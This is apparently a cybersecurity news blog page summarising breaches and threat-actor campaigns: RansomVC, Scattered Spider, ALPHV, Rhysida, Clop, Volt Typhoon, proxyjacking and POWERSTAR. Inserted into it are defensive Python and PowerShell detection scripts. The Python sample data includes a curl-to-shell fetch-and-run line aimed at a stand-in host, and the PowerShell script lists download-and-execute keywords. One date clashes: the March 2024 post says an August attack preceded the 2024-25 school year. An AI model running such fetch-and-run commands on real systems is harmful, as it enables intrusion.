Saturday, March 2, 2024

D.C. Voter Records Compromised by RansomVC: A Deep Dive

Washington, D.C. is currently facing a significant cybersecurity threat as it grapples with the aftermath of a breach by the hacking group known as RansomVC, who have claimed responsibility for infiltrating the voter records of the nation's capital. This incident has raised serious concerns about the security of sensitive data and the potential implications for the democratic process.

Detailed Overview of the Breach

On October 5, the D.C. Board of Elections received a notification from the hacking group RansomVC, announcing their successful breach. RansomVC revealed that they had managed to access a vast trove of U.S. voter data, totaling approximately 600,000 lines of information, which also included records pertaining to D.C. voters. It is important to note that this breach was facilitated through the exploitation of DataNet Systems' web server. However, it is reassuring to know that the internal servers and databases of the Board of Elections themselves were not directly compromised.

While a substantial portion of the accessed data is part of the public record, the specific details of the information exposed have not been disclosed as of yet. The Board of Elections has pledged to provide a comprehensive breakdown once their internal review is concluded. Additionally, they are committed to reaching out to individuals whose data may have been compromised, ensuring transparency and accountability.

Impacted Records

The breach in question encompasses voter records spanning from August 9, 2019, to January 25, 2022. This dataset includes information related to voters engaged in the canvass process, which takes place every odd-numbered year to maintain an up-to-date voter roll. The Board has assured the affected individuals that they will be promptly informed of any potential risks.

Ongoing Investigation

The Board of Elections is not navigating this crisis in isolation. They have enlisted the assistance of the Multi-State Information Sharing and Analysis Center's Computer Incident Response Team, as well as support from the FBI and the Department of Homeland Security, among others. These collaborative efforts are geared towards unearthing the root causes of this breach and implementing measures to prevent future occurrences.

Voter Registration Remains Secure

Despite the ongoing investigation and the continued operation of the Board of Elections website, the residents of D.C. can rest assured that they can still register to vote without compromising their personal information. Officials have confirmed that the online registration process, as well as traditional paper and in-person methods, remain secure and unaffected.

In Conclusion

The breach of Washington, D.C.'s voter data serves as a stark reminder of the ever-evolving threats in the digital age. As the investigation proceeds, stakeholders and residents alike eagerly await further details and reassurances regarding data security. The incident underscores the critical importance of safeguarding sensitive information in an era where cybersecurity threats are a constant concern.

Caesars Entertainment Cyberattack Exposes 6TB of Stolen Data

Caesars Entertainment Inc. has reportedly paid a substantial sum to hackers who successfully infiltrated the company's systems and issued threats to expose sensitive data.
This breach comes in the wake of another cyberattack on MGM Resorts International. Although Caesars Entertainment has not officially commented on the situation, the cyberattack became publicly known after Bloomberg News initially reported it. Interestingly, this revelation had a minimal impact on the company's stock, with shares remaining relatively stable.

The hacking group allegedly responsible for this attack is known as Scattered Spider or UNC3944. They have gained recognition for their expertise in social engineering tactics, which they employ to gain access to corporate networks. In the case of Caesars, the hackers initially breached an external IT vendor before infiltrating the company's network.
The timeline of the attack suggests that Caesars may have been targeted as early as August 27. Notably, some members of this hacking group are believed to be relatively young, with individuals as young as 19 years old, residing in the US and the UK.
The attackers successfully obtained sensitive data from Caesars' loyalty program members, including driver's licenses and social security numbers, as confirmed by the company in their regulatory filing.
Traditionally, hacking groups demand cryptocurrency as ransom in exchange for stolen data. Some employ ransomware tactics to encrypt computer files, providing decryption keys only after receiving payment. In recent cases, hackers have chosen to steal data and demand payment, with the threat of publishing the information if their demands are not met.
Caesars has stated that they have taken measures to ensure that unauthorized actors delete the stolen data, although they cannot provide a guarantee of this outcome.

ALPHV/BlackCat Hackers: MGM Resorts Breach Unveiled – Compromised in Mere 10 Minutes

In a recent cyber incident, the ALPHV/BlackCat ransomware group has taken responsibility for causing disruptions at MGM Resorts. Their method involved gaining an employee's trust via a phone call, a process that reportedly took only 10 minutes to execute.

The ALPHV ransomware group outlined their approach, stating, "All ALPHV ransomware group did to compromise MGM Resorts was to connect on LinkedIn, identify an employee, and then call the Help Desk." The consequences of this breach have been felt by MGM Resorts, with customers experiencing disruptions, particularly with slot machines at their casinos on the Las Vegas Strip.

As of Wednesday morning, the company is still grappling with downtime issues, including website disruptions. While MGM Resorts has not officially commented on the situation, they did mention on Tuesday that their resorts, including dining, entertainment, and gaming, remain operational.

The ALPHV ransomware group is known in the cybersecurity community for its expertise in social engineering tactics to gain initial access. Subsequently, they often employ ransomware schemes to pressure their targets into paying a ransom. As evidenced by their data leak sites, they have previously targeted major corporations, including beauty giant Estée Lauder.

MGM Resorts confirmed the cyber incident on Monday, acknowledging that it impacted various systems across its suite of casinos. While the company took swift action to protect its systems and data, including shutting down certain systems, specific details regarding the extent of the shutdown and affected systems have not been officially disclosed. Customer reports suggest issues with reservations, ATM usage, certain games, and mobile key entry into hotel rooms.

MGM Resorts has recently provided an update regarding its current operational status. They have announced that their dining, entertainment, and gaming facilities are fully operational and available for guests to enjoy. This is great news for anyone planning a visit to MGM Resorts, as they can be assured that they will have access to a wide range of amenities and activities during their stay.

Rhysida Ransomware Group Claims Responsibility for Prince George's County School Cyberattack

The recently established Rhysida ransomware group has claimed responsibility for the cyberattack on Maryland's Prince George's County school systems that occurred on August 14th, targeting one of the largest school districts in the United States.
The ransomware group listed the Maryland school district on its dark leak site on the Friday just preceding the commencement of the 2024-25 school year, a mere three days away.

Prince George's County Public School System (PGCPS), ranking as one of the nation's 20 largest school districts, fell victim to a cyberattack in the early hours of August 14th.
Although the district reported that only approximately 4,500 user accounts out of 180,000 were affected, primarily staff accounts, it now appears that sensitive data from these compromised user accounts has surfaced on Rhysida's leak site, with a price tag of 15 Bitcoin or approximately $390,000 USD.
Rhysida seems to be auctioning off a substantial volume of stolen data from the breach, including passports, driver's licenses, and other sensitive information; however, they have not disclosed a specific quantity. The auction is set to conclude six days from the initial listing on Friday, as indicated by the countdown clock displayed on the PGCPS listing. The district had been posting updates about the network outage on its website, with the latest update from August 18th preceding Rhysida's claim of responsibility.

In response to the situation, PGCPS has stated, "Prince George's County Public Schools (PGCPS), with the assistance of cybersecurity experts, continues to thoroughly investigate the cyberattack that disrupted our servers...We are now focused on completely restoring our technology environment and analyzing the scope of the event to determine any current and future data loss."
"While we are currently unaware of any specific misuse of information, cyber-attacks of this nature typically result in a breach of data. We will provide updates as needed," the district added.
Simultaneously, on its dark leak site, Rhysida posted the following alongside PGCPS data samples: "With just seven days on the clock, seize the opportunity to bid on exclusive, unique, and impressive data. Open your wallets and be ready to buy exclusive data."
"We sell only to one hand, no reselling, you will be the only owner!" the group asserted.
Shortly after becoming aware of the breach, PGCPS urged all system users to reset their passwords as a precautionary measure. Students will also be required to reset their passwords during the first week of school, commencing on August 28th, although the district stated that its primary business and student information systems did not appear to be impacted by the incident.
Furthermore, PGCPS expressed its commitment to reach out to any affected victims in the coming days.

Situated in the Washington DC Corridor, the Prince George's County school district boasts more than 200 schools and centers, serving over 133,000 students and employing nearly 20,000 staff members, as stated on its website.

Rhysida's Ongoing Activities

This relatively lesser-known threat actor has been on the ransomware scene since late May, according to US government officials who profiled the group earlier this month.
Earlier this week, Rhysida claimed responsibility for a crippling attack on the California-based healthcare conglomerate Prospect Medical Holdings (PMH), which occurred on August 3rd. This ransom attack forced several hospitals and medical facilities in Connecticut and Pennsylvania to suspend services and divert patients for several days.
PMH's subsidiaries include 17 hospitals and 165 outpatient facilities across five states, including Rhode Island and New Jersey.
In addition to adding PMH as a victim on their dark leak site, the threat actor set up a live auction offering over 2.3 terabytes of sensitive data, allegedly stolen in that attack, including an entire SQL database.

Another victim, Washington State's Pierce College, has also fallen prey to Rhysida, with the gang allegedly selling the school's stolen data starting at 10 Bitcoin to the highest bidder. This auction is scheduled to conclude on Monday.
Rhysida's leak site lists 40 other victims, nearly three times the number of victims indicated in the US officials' warning bulletin about the group on August 4th.
Rhysida is believed to have connections to the Vice Society ransom gang, notorious for its attacks on the education sector, primarily in the US, Canada, and the UK.

Exclusive: US Government Agencies Targeted in Global Cyberattack

According to a leading US cybersecurity agency, several US federal government agencies have fallen victim to a global cyberattack orchestrated by Russian cybercriminals who exploited a vulnerability in widely used software. The US Cybersecurity and Infrastructure Security Agency (CISA) is offering assistance to multiple federal agencies affected by intrusions in their MOVEit applications, as stated by Eric Goldstein, the agency's executive assistant director for cybersecurity. Efforts are underway to understand the extent of the impact and implement timely remediation.
Beyond US government agencies, "several hundred" US companies and organizations could also be impacted by this hacking spree, as estimated by a senior CISA official, referencing private experts' assessments.

The ransomware gang believed to be responsible, known as Clop, has a reputation for demanding multimillion-dollar ransoms. However, no ransom demands have been made to federal agencies, according to the senior official's background briefing.
CISA's response coincides with Progress Software, the US company responsible for the exploited software, reporting the discovery of a second vulnerability in the code, which is currently being addressed.
The Department of Energy, confirmed by a spokesperson, is among the multiple federal agencies breached in this ongoing global hacking campaign. CISA Director Jen Easterly stated that these hacks have not significantly impacted federal civilian agencies, adding that the hackers have been primarily opportunistic in exploiting the software flaw to infiltrate networks.
This news adds to the growing list of victims affected by an extensive hacking campaign that commenced two weeks ago, targeting major US universities and state governments. The relentless wave of cyberattacks puts pressure on federal officials who have pledged to combat the scourge of ransomware attacks that have paralyzed schools, hospitals, and local governments across the country.
Since late last month, the hackers have exploited a vulnerability in the widely used MOVEit software, commonly employed by companies and agencies for data transfer. Progress Software revealed a new vulnerability in the software that could be exploited by malicious actors, subsequently prompting the company to take MOVEit Cloud offline while urgently addressing the issue.
Agencies were quick to deny being affected by the hack, while the Transportation Security Administration and the State Department confirmed they were not victims. The Department of Energy took immediate action to mitigate the hack's impact upon discovering that records from two department entities were compromised. The department is working with law enforcement, CISA, and the affected entities to investigate the incident and mitigate the breach's consequences.
The Department of Energy victims include Oak Ridge Associated Universities, a not-for-profit research center, and a contractor affiliated with the department's Waste Isolation Pilot Plant in New Mexico, responsible for disposing of atomic energy-related waste.
Johns Hopkins University and its renowned health system reported that sensitive personal and financial information, including health billing records, may have been stolen in the hack. Additionally, Georgia's state-wide university system, encompassing the University of Georgia and other state colleges and universities, is investigating the scope and severity of the breach.
Although Clop initially claimed responsibility for some of the hacks, which affected BBC employees, British Airways, Shell, and state governments in Minnesota and Illinois, among others, it remains uncertain if other groups now have access to the necessary software code to carry out attacks.
The Clop ransomware group set a deadline for victims to contact them regarding ransom payment, after which they began listing additional alleged victims on their extortion site on the dark web. As of Thursday morning, no US federal agencies were listed on the dark website. Instead, the hackers boldly stated, "If you are a government, city, or police service, do not worry, we erased all your data. You do not need to contact us. We have no interest in exposing such information."

Chinese Hackers Unleash Unprecedented Tactics for Critical Infrastructure Attacks


A Chinese nation-state actor known as Volt Typhoon has been discovered using never-before-seen techniques to target critical infrastructure. CrowdStrike, the cybersecurity company tracking the adversary under the name Vanguard Panda, revealed that the hacking group has been active since mid-2020 and employs unique tradecraft to maintain remote access to their targets.

According to CrowdStrike, Volt Typhoon consistently exploits ManageEngine ADSelfService Plus vulnerabilities to gain initial access. They then utilize custom web shells for persistent access and employ living-off-the-land (LotL) techniques for lateral movement within the compromised systems.

Volt Typhoon, also known as Bronze Silhouette, is a cyber espionage group from China that has previously targeted the U.S. government, defense organizations, and critical infrastructure entities.

"This adversary relies on credentials and living-off-the-land techniques to remain stealthy and swiftly navigate through targeted environments," said Tom Etheridge, Chief Global Professional Services Officer at CrowdStrike, in an interview with The Hacker News. Analysis of the group's modus operandi reveals a strong focus on operational security, utilizing a wide range of open-source tools against a select number of victims to carry out long-term malicious activities.

The group has been described as one that "prefers web shells for persistence and relies on short bursts of activity primarily involving living-off-the-land binaries to achieve its objectives."

In one unsuccessful incident targeting an undisclosed customer, Volt Typhoon exploited the Zoho ManageEngine ADSelfService Plus service running on an Apache Tomcat server. They executed suspicious commands related to process enumeration and network connectivity. CrowdStrike noted that the attacker displayed familiarity with the target environment, executing commands rapidly and already knowing specific internal hostnames, IP addresses, remote shares, and plaintext credentials.

Further investigation of the Tomcat access logs unveiled multiple HTTP POST requests to /html/promotion/selfsdp.jspx, which is a web shell disguised as a legitimate identity security solution to evade detection. The deployment of this web shell occurred approximately six months prior to the hands-on-keyboard activity, indicating extensive reconnaissance of the target network.

The exact method used by Vanguard Panda to breach the ManageEngine environment remains unclear, but evidence suggests the exploitation of CVE-2021-40539, a critical authentication bypass flaw leading to remote code execution. The threat actor attempted to delete artifacts and tamper with access logs to obscure the forensic trail. However, they overlooked Java source and compiled class files generated during the attack, leading to the discovery of additional web shells and backdoors.

One of these backdoors is a JSP file likely obtained from an external server. It backdoors "tomcat-websocket.jar" by utilizing a remotely fetched ancillary JAR file called "tomcat-ant.jar" through a web shell. Cleanup actions are performed to conceal the attack.

The trojanized version of tomcat-websocket.jar contains three new Java classes (A, B, and C). A.class acts as another web shell capable of receiving and executing Base64-encoded and AES-encrypted commands.

"The use of a backdoored Apache Tomcat library is a previously undisclosed persistence TTP [tactics, techniques, and procedures] in use by Vanguard Panda," stated CrowdStrike. They expressed moderate confidence that the implant serves to "enable persistent access to high-value targets after the initial access phase of operations using zero-day vulnerabilities."

Etheridge emphasized that Vanguard Panda had an advanced understanding of the victim's environment, indicating their persistence and ability to evade detection during reconnaissance efforts. He added, "Additionally, it moved evidence, covering their tracks as they moved deeper into the victim's infrastructure."

Implementing robust security measures, patch management, and comprehensive logging is crucial to protect against such advanced threat actors.

Proxyjacking Campaign: Cybercriminals Targeting Vulnerable SSH Servers


A new financially motivated campaign has emerged, with cybercriminals actively hijacking vulnerable SSH servers to create a covert proxy network.

In this campaign, attackers exploit SSH for remote access, running malicious scripts that secretly enroll victim servers into a peer-to-peer (P2P) proxy network such as Peer2Profit or Honeygain, as reported by Akamai researcher Allen West. Unlike cryptojacking, where compromised systems are used for unauthorized cryptocurrency mining, proxyjacking allows threat actors to utilize the victim's unused bandwidth to operate various services as a P2P node.

This approach offers dual benefits: it enables the attacker to monetize the surplus bandwidth with significantly reduced resource usage compared to cryptojacking, while also minimizing the risk of detection. "It is a stealthier alternative to cryptojacking and poses serious implications that amplify the challenges of proxied Layer 7 attacks," explains West.

The use of proxyware services for anonymity can be a double-edged sword, as malicious actors can exploit them to obfuscate the origin of their attacks by routing traffic through intermediary nodes.

Akamai, which discovered this campaign on June 8, 2023, reveals that the activity aims to breach vulnerable SSH servers and deploy an obfuscated Bash script. This script fetches necessary dependencies from a compromised web server, including the camouflaged curl command-line tool disguised as a CSS file ("csdark.css").

The stealthy script also actively terminates competing instances of bandwidth-sharing programs before launching Docker services that leverage the victim's bandwidth for financial gains.
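Two of the artifacts described above are cheap to check for on a host: a native binary stored under a text-looking name (the curl tool saved as "csdark.css") and proxyware containers running on the machine. The following is an added example, not Akamai's code: it walks a directory for files whose extension says text but whose magic bytes say executable, and scans `docker ps` output for images naming the bandwidth-sharing services mentioned on this page. The sample files, the image names and the container IDs are constructed for the example.

```python
"""Spot executables disguised with text extensions and proxyware containers.
Added example; the sample tree and the docker ps output are constructed."""
import os
import tempfile

# Extensions an admin or web server would expect to hold plain text.
TEXT_EXTS = {".css", ".js", ".txt", ".html", ".json", ".log"}

# Leading bytes of executable formats worth catching (assumption: Linux,
# Windows and macOS hosts plus shell scripts with a shebang).
MAGIC = (
    (b"\x7fELF", "ELF"),
    (b"MZ", "PE"),
    (b"\xcf\xfa\xed\xfe", "Mach-O"),
    (b"\xfe\xed\xfa\xcf", "Mach-O"),
    (b"#!/bin/sh", "shell script"),
    (b"#!/bin/bash", "shell script"),
    (b"#!/usr/bin/env bash", "shell script"),
)

# Services named on the page; matched case-insensitively against image names.
PROXYWARE_KEYWORDS = ("peer2profit", "honeygain")

# Constructed `docker ps` output (container IDs and image names are made up).
SAMPLE_DOCKER_PS = """\
CONTAINER ID   IMAGE                           COMMAND        STATUS
1a2b3c4d5e6f   nginx:1.25                      "nginx"        Up 3 days
9f8e7d6c5b4a   peer2profit/peer2profit_linux   "/app/start"   Up 2 hours
0011aabbccdd   honeygain/honeygain:latest      "/honeygain"   Up 2 hours
"""


def classify(path):
    """Return the executable format name if the file's magic matches, else None."""
    with open(path, "rb") as f:
        head = f.read(32)
    for magic, name in MAGIC:
        if head.startswith(magic):
            return name
    return None


def find_disguised(root):
    """Return sorted [(relative_path, format)] for text-named executables."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in TEXT_EXTS:
                continue
            full = os.path.join(dirpath, name)
            fmt = classify(full)
            if fmt:
                findings.append((os.path.relpath(full, root), fmt))
    return sorted(findings)


def find_proxyware_containers(docker_ps_output):
    """Return [(container_id, image)] whose image names a known proxyware service."""
    found = []
    for line in docker_ps_output.splitlines()[1:]:  # skip header row
        fields = line.split()
        if len(fields) < 2:
            continue
        container_id, image = fields[0], fields[1]
        if any(k in image.lower() for k in PROXYWARE_KEYWORDS):
            found.append((container_id, image))
    return found


def build_sample_tree():
    """Create a constructed directory: clean CSS, a fake ELF as .css, a shell
    script as .js, and a real-looking binary in a binary location (not flagged)."""
    root = tempfile.mkdtemp(prefix="proxyjack_demo_")
    fake_elf = b"\x7fELF\x02\x01\x01" + b"\x00" * 9  # constructed ELF header only
    samples = {
        "static/site.css": b"body { color: #333; }\n",
        "static/csdark.css": fake_elf,
        "static/app.js": b"#!/bin/bash\ncurl -s http://example.invalid/x | sh\n",
        "bin/curl": fake_elf,
    }
    for rel, data in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(data)
    return root


if __name__ == "__main__":
    for rel, fmt in find_disguised(build_sample_tree()):
        print(f"disguised {fmt}: {rel}")
    for cid, image in find_proxyware_containers(SAMPLE_DOCKER_PS):
        print(f"proxyware container {cid}: {image}")
```

On a real host, feed `find_disguised` the web root or /tmp and `find_proxyware_containers` the output of `docker ps`; also compare the process list against the same keywords, since not every proxyware client runs in a container.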

Further investigation of the web server hosting the campaign uncovered the presence of a cryptocurrency miner, indicating that the threat actors are involved in both cryptojacking and proxyjacking attacks. While proxyware itself is not necessarily malicious, Akamai warns that "some of these companies fail to properly verify the sourcing of IPs in the network and occasionally encourage users to install the software on their work computers."

However, when installed without users' knowledge or consent, these operations can cross into the realm of cybercrime, allowing threat actors to control multiple systems and generate illicit revenue.

"Old techniques remain effective, especially when paired with new outcomes," notes West. "Implementing standard security practices, including strong passwords, patch management, and comprehensive logging, remains crucial for effective prevention."

African Nations Face Escalating Phishing & Compromised Password Cyberattacks: Report


In 2022, cyberattacks targeting large enterprises in African nations witnessed a significant surge. Kenyan businesses reported an 82% increase in these attacks, while South African and Zambian businesses experienced a 62% increase each.
According to a report by pan-African technology group Liquid C2, the primary method of attack was through phishing or spam attacks, accounting for 61% of incidents. Another 48% of attacks exploited compromised passwords.
Jess Parnell, the Vice President of Security Operations at Centripetal, suggests that cyber attackers might be focusing on businesses in Kenya, South Africa, and Zambia due to their emerging economies and expanding business sectors. These countries are seen as attractive targets for financial gain through activities like data theft, ransomware attacks, and financial fraud.
Anna Collard, a security evangelist at KnowBe4 Africa, believes that most attacks are still primarily opportunistic, with ransomware groups targeting compromised networks and credentials obtained from access brokers. However, she acknowledges that the targeting of emerging economies is influenced by the desire to avoid retaliation from the US. This makes Southern Africa and other economies with high cyber-dependency on the continent appealing targets.

Africa Witnessing Increased Hiring for Cybersecurity Professionals
The Liquid C2 report highlights a growing gap of 100,000 certified cybersecurity professionals in Africa. Despite this, all respondents in the report mentioned significant advancements in their cloud and digital strategies, as well as related cybersecurity capabilities.
Moreover, 68% of the respondents stated that they had hired cybersecurity staff or enlisted the services of a cybersecurity team in the past year. Kenya had the highest percentage at 82%, followed by South Africa at 63%, and Zambia at 62%.
Parnell emphasizes that the persistence of attacks, despite increased staffing and cybersecurity investments, suggests that investing in cybersecurity measures alone does not guarantee protection against threats. He stresses the importance of a proactive approach to threat intelligence-powered cybersecurity, continuously updating defenses to mitigate risks.
Defending against cyberattacks requires a multi-layered approach, including implementing robust security measures, raising employee awareness about common attack vectors like phishing, regular software and system updates, vulnerability assessments, and prompt response to security incidents. Prioritizing cybersecurity and proactive measures can help businesses defend against attacks and minimize the impact of successful breaches.
Klaus Schenk, Senior Vice President of Security and Threat Research at Verimatrix, cautions that increasing cybersecurity staff may attract malicious actors seeking challenges or opportunities to demonstrate their skills. However, he states that the benefits outweigh the risks, as augmenting the cybersecurity team can significantly mitigate the impact of cyberattacks.
The ultimate goal should be to minimize the occurrence of such attacks and strive for a state where they have no impact whatsoever, Schenk concludes.

CISA Adds Samsung Phone Flaws to 'Must Patch' List, Likely Exploited by Spyware Vendor

The US Cybersecurity and Infrastructure Security Agency (CISA) has included several vulnerabilities affecting Samsung smartphones in its Known Exploited Vulnerabilities Catalog. It is highly likely that these flaws have been exploited by a commercial spyware vendor.
CISA updated its catalog with eight new vulnerabilities, including two vulnerabilities in D-Link routers and access points that were exploited by a Mirai botnet variant. The remaining six vulnerabilities impact Samsung mobile devices, and they were all addressed by Samsung through patches released in 2021.
Among the vulnerabilities is CVE-2021-25487, an out-of-bounds read issue in the modem interface driver that can lead to arbitrary code execution. This vulnerability was fixed by Samsung in October 2021. Although Samsung has classified it as moderate, its severity is considered high according to the CVSS score.
Another vulnerability addressed in the same October 2021 patch batch is CVE-2021-25489, a low-severity format string bug in the modem interface driver that can result in a Denial-of-Service (DoS) condition.

CISA also included moderate-severity vulnerabilities CVE-2021-25394 and CVE-2021-25395, which are use-after-free bugs in the MFC charger driver. Samsung resolved these issues in May 2021.
The remaining two vulnerabilities are CVE-2021-25371, a moderate-severity flaw that allows an attacker to load arbitrary ELF files inside the DSP driver, and CVE-2021-25372, a moderate-severity out-of-bounds access vulnerability in the same driver. Samsung patched both vulnerabilities in March 2021.

It is worth noting that Samsung has not updated its old advisories to warn users about the exploitation of these vulnerabilities.

While there are no public reports of exploitation for the Samsung mobile device vulnerabilities added to CISA's 'must-patch' list, it is highly likely that a commercial spyware vendor has already taken advantage of them.

In November 2022, Google disclosed three similar Samsung phone vulnerabilities with 2021 CVEs that were exploited by an unnamed spyware vendor against Android devices while they were still zero-days. These three vulnerabilities were patched in March 2021. Google has also indicated that it was aware of several other Samsung vulnerabilities with 2021 CVEs that had been exploited in attacks.

This suggests that the vulnerabilities added to CISA's catalog this week have also been exploited by spyware vendors, with Google monitoring their activities. SecurityWeek has reached out to Google for confirmation on this matter.


WhatsApp Enhances Proxy Feature to Counter Internet Shutdowns


Meta's WhatsApp has recently introduced updates to its proxy feature, expanding the range of content that can be shared within conversations. The messaging service now allows users to send and receive images, voice notes, files, stickers, and GIFs, as confirmed by WhatsApp in a statement to The Hacker News. These new features were initially reported by BBC Persian.
The latest improvements include simplified setup steps to streamline the process, along with the introduction of shareable links. These links enable users to easily share functioning proxy addresses with their contacts, facilitating automatic installation.
Proxy server support was officially launched by WhatsApp in January, providing users with a means to bypass government-imposed censorship and internet shutdowns. By utilizing proxy servers, users can indirectly access WhatsApp even in regions where access is restricted.

To assist users in setting up their proxy servers, WhatsApp has made available a reference implementation. This implementation allows users to create a proxy server with ports 80, 443, or 5222 and a domain name that directs to the server's IP address.
"A proxy server acts as an intermediary gateway between WhatsApp and external servers," explained WhatsApp. "Users can search for trusted accounts on social media that regularly share verified proxy addresses, which can then be added to their WhatsApp accounts."
Internet shutdowns have become increasingly prevalent worldwide during times of crises, conflicts, communal violence, and even to prevent cheating in exams. In 2022, authorities in 35 countries implemented internet shutdowns a total of 187 times. Alarmingly, within the first five months of 2023, this number has already reached 80.
India, in particular, accounted for 84 shutdowns in 2022, maintaining its position as the leading democratic country enforcing deliberate internet restrictions for the fifth consecutive year.

Unveiling The Latest Iranian Hacker's Espionage Tactics: POWERSTAR Backdoor

Charming Kitten, a notorious nation-state actor linked to Iran's Islamic Revolutionary Guard Corps (IRGC), has recently surfaced in a targeted spear-phishing campaign utilizing an updated version of their potent PowerShell backdoor called POWERSTAR.

Volexity researchers, Ankur Saini and Charlie Gardner, revealed in a recent report the implementation of enhanced operational security measures within the malware. These measures pose significant challenges for analysts attempting to analyze and gather intelligence on the threat.

Renowned for their expertise in social engineering, Charming Kitten employs various tactics to deceive their targets. Crafted personas on social media platforms, sustained conversations to establish rapport, and the subsequent delivery of malicious links are among their primary methods. The group is also recognized by multiple names, including APT35, Cobalt Illusion, Mint Sandstorm (formerly Phosphorus), and Yellow Garuda.

In addition to POWERSTAR, recent Charming Kitten intrusions have featured other implants like PowerLess and BellaCiao, indicating a wide array of espionage tools at their disposal to achieve strategic objectives.

Initially exposed by Check Point in January 2022, POWERSTAR (also known as CharmPower) was publicly documented in connection with attacks exploiting Log4Shell vulnerabilities in publicly exposed Java applications. Since then, the backdoor has been employed in at least two other campaigns, as detailed by PwC in July 2022 and Microsoft in April 2023.

Volexity, which previously detected a rudimentary variant of POWERSTAR in 2021 distributed through a malicious macro in a DOCM file, now reports that the May 2023 attack wave utilizes an LNK file within a password-protected RAR archive to download the backdoor from Backblaze. Furthermore, Charming Kitten has taken measures to impede analysis during this attack.

"With POWERSTAR, Charming Kitten aimed to reduce the risk of malware exposure, analysis, and detection by delivering the decryption method separately from the initial code without writing it to disk," stated the researchers.

This gives the operators a safeguard: because the decryption routine is fetched from the command-and-control (C2) server at run time rather than shipped with the payload, a sample recovered after the C2 server has gone offline can no longer be decrypted, so the corresponding POWERSTAR payload stays opaque to analysts.

POWERSTAR boasts an extensive range of features, empowering it to execute PowerShell and C# commands remotely, establish persistence, gather system information, and download additional modules. These modules allow the backdoor to enumerate running processes, capture screenshots, search for files matching specific extensions, and monitor the integrity of persistence components.

Significant improvements and expansions have been made to the cleanup module, designed to eradicate any traces of the malware's presence and eliminate persistence-related registry keys. These enhancements underscore Charming Kitten's ongoing efforts to refine their techniques and evade detection. Volexity also discovered a distinct variant of POWERSTAR that employs a decentralized InterPlanetary Filesystem (IPFS) to retrieve a hard-coded C2 server, enhancing the group's attack infrastructure resilience.
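As an added example (not code from Volexity, and not part of the Charming Kitten toolset), the following PowerShell triages shortcut files for the delivery pattern described above: an LNK that, once extracted from an archive, launches a script host to fetch and run a payload. The scan roots, the list of script hosts and the argument keywords are assumptions chosen for illustration, not indicators from the report.

```powershell
# Added example: triage .lnk files whose target is a script interpreter or whose
# arguments look like download-and-execute. Scan roots and keyword lists are
# assumptions for illustration; tune them to your environment.
param(
    [string[]]$ScanRoots = @("$env:USERPROFILE\Downloads", "$env:TEMP")
)

# Interpreters a phishing shortcut typically points at instead of a document.
$scriptHosts = 'powershell', 'pwsh', 'cmd', 'mshta', 'wscript', 'cscript', 'rundll32', 'regsvr32'
# Argument fragments that indicate hidden execution or fetching a second stage.
$suspiciousArgs = '-enc', 'iex', 'invoke-expression', 'downloadstring', 'downloadfile',
                  'invoke-webrequest', 'bitsadmin', 'frombase64string', '-w hidden',
                  'windowstyle', 'http://', 'https://'

$shell = New-Object -ComObject WScript.Shell

foreach ($root in $ScanRoots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }
    Get-ChildItem -LiteralPath $root -Filter *.lnk -Recurse -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $lnk     = $shell.CreateShortcut($_.FullName)
        $target  = [string]$lnk.TargetPath
        $lnkArgs = [string]$lnk.Arguments            # $args is reserved in PowerShell
        $exe     = ([System.IO.Path]::GetFileNameWithoutExtension($target)).ToLower()
        $reasons = @()

        if ($scriptHosts -contains $exe) { $reasons += "target is script host '$exe'" }
        foreach ($kw in $suspiciousArgs) {
            if ($lnkArgs -match [regex]::Escape($kw)) { $reasons += "argument contains '$kw'" }
        }
        # A document-looking name (Invoice.pdf.lnk) in front of a script host is the classic lure.
        if ($_.BaseName -match '\.(pdf|docx?|xlsx?|txt)$') { $reasons += 'double extension in name' }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Path      = $_.FullName
                Target    = $target
                Arguments = $lnkArgs
                Reasons   = ($reasons -join '; ')
            }
        }
    }
}
```

Run it as a script (`.\Find-SuspiciousLnk.ps1 -ScanRoots 'D:\extracted'`, a name assumed here) against the folder where an archive was unpacked. One caveat: the WScript.Shell COM object can truncate very long argument strings, so an empty or cut-off Arguments value on a shortcut that targets a script host is itself a reason to open the file in a dedicated LNK parser rather than to clear it.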

Coinciding with this development, MuddyWater (aka Static Kitten) has employed an undocumented command-and-control (C2) framework known as PhonyC2 to distribute malicious payloads to compromised hosts.

"The phishing playbook utilized by Charming Kitten and the overall purpose of POWERSTAR remain consistent," stated the researchers. "References to persistence mechanisms and executable payloads within the POWERSTAR Cleanup module strongly indicate a broader set of tools utilized by Charming Kitten for conducting malware-enabled espionage."

Stay informed about the evolving techniques employed by Charming Kitten and gain valuable insights into countering state-sponsored cyber espionage by regularly visiting our cybersecurity blog. Our experts provide comprehensive coverage, analysis, and effective mitigation strategies to safeguard your organization against these sophisticated threats.


Apple Releases Security Patches for Actively Exploited Flaws in iOS, macOS, and Safari


Apple has taken prompt action to address a set of vulnerabilities that were actively exploited in the wild. The updates released by Apple cover iOS, iPadOS, macOS, watchOS, and the Safari browser. Among the vulnerabilities are a pair of zero-days associated with a mobile surveillance campaign known as Operation Triangulation, which has been active since 2019. Apple acknowledges that these issues have been exploited and urges users to update their devices immediately.

Details of the Exploited Flaws: The identified vulnerabilities include:

CVE-2023-32434: An integer overflow vulnerability in the Kernel that could allow a malicious app to execute arbitrary code with kernel privileges.

CVE-2023-32435: A memory corruption vulnerability in WebKit that could lead to arbitrary code execution when processing specially crafted web content.

Apple acknowledges that these vulnerabilities may have been exploited in versions of iOS released prior to iOS 15.7. The discovery of these flaws is credited to Kaspersky researchers Georgy Kucherin, Leonid Bezvershenko, and Boris Larin.

Description of Operation Triangulation: Kaspersky has analyzed the spyware implant used in a zero-click attack campaign targeting iOS devices. The attack involves exploiting a remote code execution vulnerability through iMessages. The implant, named TriangleDB, operates in memory, leaving no traces after a device reboot. It carries out various data collection and tracking activities, including interacting with the device's file system, managing processes, extracting keychain items for gathering credentials, and monitoring geolocation.

Additional Zero-Day and Patch: Apple has also addressed another zero-day vulnerability, CVE-2023-32439, which was reported anonymously. This flaw could result in arbitrary code execution when processing malicious web content. The update includes improved checks to mitigate this type confusion issue.

Devices and Platforms Affected: The updates are available for the following platforms:

iOS 16.5.1 and iPadOS 16.5.1: iPhone 8 and later, various iPad models

